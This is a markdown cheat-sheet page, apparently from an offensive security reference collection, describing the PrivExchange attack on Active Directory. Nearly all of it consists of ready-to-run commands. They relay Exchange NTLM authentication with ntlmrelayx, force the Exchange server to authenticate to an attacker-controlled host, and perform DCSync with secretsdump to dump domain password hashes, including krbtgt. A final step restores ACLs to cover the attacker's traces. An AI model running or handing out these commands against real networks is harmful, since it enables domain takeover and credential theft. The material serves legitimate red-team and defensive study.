privexchange.md (3037B)
1 --- 2 title: "PrivExchange" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/CVE/PrivExchange.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/CVE/PrivExchange.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # PrivExchange 12 13 Exchange your privileges for Domain Admin privs by abusing Exchange. 14 :warning: You need a shell on a user account with a mailbox. 15 16 1. Exchange server hostname or IP address 17 18 ```bash 19 pth-net rpc group members "Exchange Servers" -I dc01.domain.local -U domain/username 20 ``` 21 22 2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket). 23 24 ```powershell 25 ntlmrelayx.py -t ldap://dc01.domain.local --escalate-user username 26 ``` 27 28 3. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server. Forcing the Exchange server's to send back its NTLMv2 hash to a controlled machine. 29 30 ```bash 31 # https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py 32 python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx 33 python privexchange.py -ah 10.0.0.2 mail01.domain.local -d domain.local -u user_exchange -p pass_exchange 34 35 # https://github.com/G0ldenGunSec/PowerPriv 36 powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016 37 ``` 38 39 4. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash 40 41 ```bash 42 python secretsdump.py xxxxxxxxxx -just-dc 43 python secretsdump.py lab/buff@192.168.0.2 -ntds ntds -history -just-dc-ntlm 44 ``` 45 46 5. Clean your mess and restore a previous state of the user's ACL 47 48 ```powershell 49 python aclpwn.py --restore ../aclpwn-20190319-125741.restore 50 ``` 51 52 Alternatively you can use the Metasploit module 53 54 [`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420) 55 56 Alternatively you can use an all-in-one tool : Exchange2domain. 57 58 ```powershell 59 git clone github.com/Ridter/Exchange2domain 60 python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip 61 python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip 62 ``` 63 64 ## References 65 66 * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) 67 * [Exploiting PrivExchange - April 11, 2019 - @chryzsh](https://chryzsh.github.io/exploiting-privexchange/) 68 * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) 69 * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)